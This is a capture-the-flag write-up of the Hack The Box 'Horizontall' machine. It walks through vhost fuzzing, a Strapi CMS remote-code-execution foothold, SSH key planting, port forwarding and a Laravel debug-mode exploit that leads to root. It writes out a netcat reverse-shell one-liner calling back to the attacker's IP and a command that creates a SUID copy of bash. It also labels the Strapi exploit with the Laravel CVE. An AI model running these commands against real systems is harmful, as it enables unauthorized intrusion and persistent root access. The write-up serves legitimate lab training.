Hello everyone, here I will explain how I managed to pwn the Horizontall machine from HTB.

Recon

  1. I started with an nmap port scan. All I found was 2 open ports:
22/tcp ssh, 80/tcp nginx 1.14.0
  2. Let's check port 80.
Don't forget to add the machine IP to /etc/hosts; as root run this -> echo "10.10.11.105   horizontall.htb" >> /etc/hosts
  • I enumerated the site but found nothing.
  3. Here I decided to do directory brute-forcing.
  • Found nothing there either. :( Sad
  4. So I jumped directly to checking for sub-domains & VHOSTs:
ffuf -u http://horizontall.htb/ -H "Host: FUZZ.horizontall.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 -mc 200 -v
  • And yeeeey!!! Found VHOSTs.

Let's add those sub-domains to /etc/hosts as root.

  5. Now, we know that www will open the main page of the site, so I checked api-prod, and its main page is ->
  • By directory brute-forcing on this VHOST I found some valuable dirs:
    1. By checking /reviews and /users we got 3 names: john, doe, wail. Note them.
    2. Then I checked /admin and got a login form for Strapi CMS.
    3. Tried using default creds like admin:admin and some SQLi, but nothing worked.
    4. Then I tried to find the version of the CMS from the site itself, in case it's vulnerable.
  • By viewing the page source I found 2 JS files and started enumerating them.
  • Searching the Strapi docs, I found that we can get the version from the strapi-plugin-content-type plugin line, because that plugin is always activated; by searching for it I found this.

Foothold

  1. Using searchsploit strapi I got Strapi 3.0.0-beta.17.7 RCE.
  • I had a problem with this script, so I used this one: CVE-2021-3129
  2. We will use it by running the exploit script, then write the reverse shell cmd inside the script: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 4444 >/tmp/f
  • After running, the script will give us the valid creds for admin, as we see in 1.

Don't forget to run the listener first: nc -nlvp 4444.

  • Then we can write our reverse shell command, as you see in 2.
  3. Now we got a shell as the strapi user. We can read some files from the developer user.
  4. Started enumerating for any passwords or SSH keys by searching for password, id_rsa, authorized_keys, and I got one under /opt/strapi/.ssh/authorized_keys.
  5. I have write permission on this .ssh/ folder because I'm the owner of it,
  • so I created an SSH key to access via SSH:
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
  • and copied the id_rsa private key to my machine to connect with it.

Privilege Escalation

  1. Now I'm connected via SSH.
  2. After some enumeration on the target machine:
  • using find / -perm /4000 2>/dev/null got nothing.
  • Searched for any files or running services that could be exploited.
  3. By enumerating open ports with netstat -ano, I got some new ports that did not appear in my port scan.
  • I found 3 ports listening locally. As we know, 3306 is for the MySQL database, and 1337 is for the Strapi API (if you read the exploit script you will know).
  4. So I checked 8000/tcp using curl 127.0.0.1:8000
  • I found another site running locally with the title laravel.
  5. So to view it in the browser and enumerate it we need to set up port forwarding.
  • Running ssh -L 8000:127.0.0.1:8000 strapi@10.10.11.105 -i id_rsa will start the port forwarding.
  • It's a simple Laravel site; by enumerating this website you will find the framework version in the page footer: Laravel v8 (PHP v7.4.18).
  6. So I searched for an exploit for it, in case it's vulnerable, and I found 2 exploits:
  • one was XSS, which I didn't need, and the second was RCE via debug mode.
  • I tried to run this script but had some problems in the code itself.
  7. So after some searching I found another one which worked for me; you can get it from here -> CVE-2021-3129
  • So I ran this exploit script from my machine against the forwarded port.
  8. Last step: I got a full shell as root.
  • Run the exploit script to copy the bash shell as root and set the SUID bit on it, then run it.
  • Running from my machine too:
$ ./exploit.py http://127.0.0.1:8000 Monolog/RCE1 "cp /bin/bash /tmp/bash; chmod +s /tmp/bash"
  • Back in the SSH strapi shell, run /tmp/bash -p

Congrats!!!! You are now full root ….. xD

Hint: For fast rooting we can use pkexec CVE-2021-4034, but it's not the good way to pwn the machine xD. PoC ==>